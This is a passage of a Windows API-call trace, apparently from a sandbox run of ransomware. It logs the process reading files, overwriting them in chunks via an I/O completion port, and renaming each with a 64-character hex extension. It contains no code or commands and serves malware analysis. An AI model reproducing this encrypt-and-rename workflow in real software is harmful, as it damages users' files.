() returned 0x1 [0156.240] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0156.240] ReadFile (in: hFile=0x5b0, lpBuffer=0x75aa7f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x758a6c0 | out: lpBuffer=0x75aa7f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x758a6c0) returned 1 [0156.240] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0156.240] ReadFile (in: hFile=0x5b4, lpBuffer=0x7600180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048) returned 1 [0156.241] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0156.241] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x74723c8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74723c8, ReturnLength=0x73dfc54) returned 0x0 [0156.242] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpString2=".563ACA39ED0F9FC6D5DFC7CF54A945AA295C57DA3610076BEB767FDE85333359" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.563ACA39ED0F9FC6D5DFC7CF54A945AA295C57DA3610076BEB767FDE85333359") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.563ACA39ED0F9FC6D5DFC7CF54A945AA295C57DA3610076BEB767FDE85333359" [0156.243] GetProcessHeap () returned 0x270000 [0156.243] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1ac) returned 0x4246408 [0156.243] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x73dfc44, FileInformation=0x4246408, Length=0x1ac, FileInformationClass=0xa) returned 0x0 [0156.244] CloseHandle (hObject=0x594) returned 1 [0156.255] GetProcessHeap () returned 0x270000 [0156.258] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7472318 | out: hHeap=0x270000) returned 1 [0156.258] RtlInterlockedCompareExchange64 () returned 0x2 [0156.258] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0156.258] WriteFile (in: hFile=0x5b0, lpBuffer=0x75aa7f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x758a6c0 | out: lpBuffer=0x75aa7f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x758a6c0) returned 1 [0156.259] RtlInterlockedCompareExchange64 () returned 0x1 [0156.259] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0156.260] WriteFile (in: hFile=0x5b4, lpBuffer=0x7600180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048) returned 1 [0156.261] RtlInterlockedCompareExchange64 () returned 0x2 [0156.261] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0156.261] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x758a770, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x758a770, ReturnLength=0x73dfc54) returned 0x0 [0156.263] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml", lpString2=".51BE11C64767BC90CEA6861EE065004515107E8BDF4D9818A920AE838B88F51E" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml.51BE11C64767BC90CEA6861EE065004515107E8BDF4D9818A920AE838B88F51E") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml.51BE11C64767BC90CEA6861EE065004515107E8BDF4D9818A920AE838B88F51E" [0156.263] GetProcessHeap () returned 0x270000 [0156.263] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a2) returned 0x4277fe8 [0156.263] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x73dfc44, FileInformation=0x4277fe8, Length=0x1a2, FileInformationClass=0xa) returned 0x0 [0156.265] CloseHandle (hObject=0x5b0) returned 1 [0156.270] GetProcessHeap () returned 0x270000 [0156.272] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x758a6c0 | out: hHeap=0x270000) returned 1 [0156.272] RtlInterlockedCompareExchange64 () returned 0x3 [0156.272] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0156.272] NtQueryObject (in: Handle=0x5b4, ObjectInformationClass=0x1, ObjectInformation=0x75e00f8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x75e00f8, ReturnLength=0x73dfc54) returned 0x0 [0156.274] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpString2=".741B0DFEC9162FB89ED607D6E6498CBE755527298847CC4DF4BC7EEC5DF1BA1B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.741B0DFEC9162FB89ED607D6E6498CBE755527298847CC4DF4BC7EEC5DF1BA1B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.741B0DFEC9162FB89ED607D6E6498CBE755527298847CC4DF4BC7EEC5DF1BA1B" [0156.274] GetProcessHeap () returned 0x270000 [0156.274] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1c8) returned 0x432ff60 [0156.275] NtSetInformationFile (FileHandle=0x5b4, IoStatusBlock=0x73dfc44, FileInformation=0x432ff60, Length=0x1c8, FileInformationClass=0xa) returned 0x0 [0156.276] CloseHandle (hObject=0x5b4) returned 1 [0156.293] GetProcessHeap () returned 0x270000 [0156.296] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.302] RtlInterlockedCompareExchange64 () returned 0x2 [0156.302] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0163.871] ReadFile (in: hFile=0x5a8, lpBuffer=0x75a26b0, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x7582578 | out: lpBuffer=0x75a26b0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7582578) returned 1 [0163.871] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0163.871] WriteFile (in: hFile=0x5b4, lpBuffer=0x7552400*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75322c8 | out: lpBuffer=0x7552400*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75322c8) returned 1 [0163.873] RtlInterlockedCompareExchange64 () returned 0x2 [0163.873] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0163.873] WriteFile (in: hFile=0x5a8, lpBuffer=0x75a26b0*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7582578 | out: lpBuffer=0x75a26b0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7582578) returned 1 [0163.874] RtlInterlockedCompareExchange64 () returned 0x3 [0163.874] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0163.874] NtQueryObject (in: Handle=0x5b4, ObjectInformationClass=0x1, ObjectInformation=0x7532378, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7532378, ReturnLength=0x73dfc54) returned 0x0 [0163.875] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg", lpString2=".BAD8664082EC7D4008A1A1993259766E7ADF81C52789DB8F594220A593461603" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.BAD8664082EC7D4008A1A1993259766E7ADF81C52789DB8F594220A593461603") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.BAD8664082EC7D4008A1A1993259766E7ADF81C52789DB8F594220A593461603" [0163.875] GetProcessHeap () returned 0x270000 [0163.875] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x15c) returned 0x42fb0a8 [0163.876] NtSetInformationFile (FileHandle=0x5b4, IoStatusBlock=0x73dfc44, FileInformation=0x42fb0a8, Length=0x15c, FileInformationClass=0xa) returned 0x0 [0163.937] CloseHandle (hObject=0x5b4) returned 1 [0163.940] GetProcessHeap () returned 0x270000 [0163.941] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75322c8 | out: hHeap=0x270000) returned 1 [0163.948] RtlInterlockedCompareExchange64 () returned 0x1 [0163.948] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0163.949] WriteFile (in: hFile=0x5b8, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x5c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0163.950] RtlInterlockedCompareExchange64 () returned 0x0 [0163.950] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0164.439] ReadFile (in: hFile=0x5ac, lpBuffer=0x7492450, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318) returned 1 [0164.441] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0164.441] NtQueryObject (in: Handle=0x5a8, ObjectInformationClass=0x1, ObjectInformation=0x76403b0, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x76403b0, ReturnLength=0x73dfc54) returned 0x0 [0164.444] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\saKgVJ8BvE0.pdf", lpString2=".D11C2449620F7B201A0FB3E5C61679CA38839E198179EA32B42989EBF5C11934" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\saKgVJ8BvE0.pdf.D11C2449620F7B201A0FB3E5C61679CA38839E198179EA32B42989EBF5C11934") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\saKgVJ8BvE0.pdf.D11C2449620F7B201A0FB3E5C61679CA38839E198179EA32B42989EBF5C11934" [0164.444] GetProcessHeap () returned 0x270000 [0164.444] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12a) returned 0x425d198 [0164.444] NtSetInformationFile (FileHandle=0x5a8, IoStatusBlock=0x73dfc44, FileInformation=0x425d198, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0164.450] CloseHandle (hObject=0x5a8) returned 1 [0164.455] GetProcessHeap () returned 0x270000 [0164.456] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7640300 | out: hHeap=0x270000) returned 1 [0164.694] RtlInterlockedCompareExchange64 () returned 0x4 [0164.694] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0165.673] WriteFile (in: hFile=0x5e4, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0165.675] RtlInterlockedCompareExchange64 () returned 0x0 [0165.675] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0165.690] WriteFile (in: hFile=0x5e4, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0165.692] RtlInterlockedCompareExchange64 () returned 0x0 [0165.692] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0165.701] WriteFile (in: hFile=0x5e4, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0165.703] RtlInterlockedCompareExchange64 () returned 0x0 [0165.703] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0165.712] WriteFile (in: hFile=0x5e4, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x6200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0165.713] RtlInterlockedCompareExchange64 () returned 0x0 [0165.713] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0165.782] WriteFile (in: hFile=0x5e4, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0165.974] RtlInterlockedCompareExchange64 () returned 0x1 [0165.974] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0165.990] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x744a270, ReturnLength=0x73dfc54) returned 0x0 [0165.997] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\6 IQKF_vkJtPe8lb.jpg", lpString2=".2CD2F3BA569A7D6B64C8EDE119AC630114E97D8B190323AF3057A63773AFEE4B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\6 IQKF_vkJtPe8lb.jpg.2CD2F3BA569A7D6B64C8EDE119AC630114E97D8B190323AF3057A63773AFEE4B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\6 IQKF_vkJtPe8lb.jpg.2CD2F3BA569A7D6B64C8EDE119AC630114E97D8B190323AF3057A63773AFEE4B" [0165.997] GetProcessHeap () returned 0x270000 [0165.997] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x42770b8 [0165.997] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x73dfc44, FileInformation=0x42770b8, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0165.999] CloseHandle (hObject=0x598) returned 1 [0165.999] GetProcessHeap () returned 0x270000 [0166.001] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0166.004] RtlInterlockedCompareExchange64 () returned 0x2 [0166.004] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.016] WriteFile (in: hFile=0x5b0, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.017] RtlInterlockedCompareExchange64 () returned 0x0 [0166.017] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.037] WriteFile (in: hFile=0x5b0, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.038] RtlInterlockedCompareExchange64 () returned 0x0 [0166.038] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.050] WriteFile (in: hFile=0x5b0, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.051] RtlInterlockedCompareExchange64 () returned 0x0 [0166.051] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.069] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.071] RtlInterlockedCompareExchange64 () returned 0x0 [0166.071] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.090] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.091] RtlInterlockedCompareExchange64 () returned 0x0 [0166.091] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.102] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.103] RtlInterlockedCompareExchange64 () returned 0x0 [0166.103] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.115] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.116] RtlInterlockedCompareExchange64 () returned 0x0 [0166.116] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.128] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.130] RtlInterlockedCompareExchange64 () returned 0x0 [0166.130] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.145] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.146] RtlInterlockedCompareExchange64 () returned 0x0 [0166.146] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.162] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.163] RtlInterlockedCompareExchange64 () returned 0x0 [0166.163] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.178] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x5a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.179] RtlInterlockedCompareExchange64 () returned 0x0 [0166.179] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.197] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 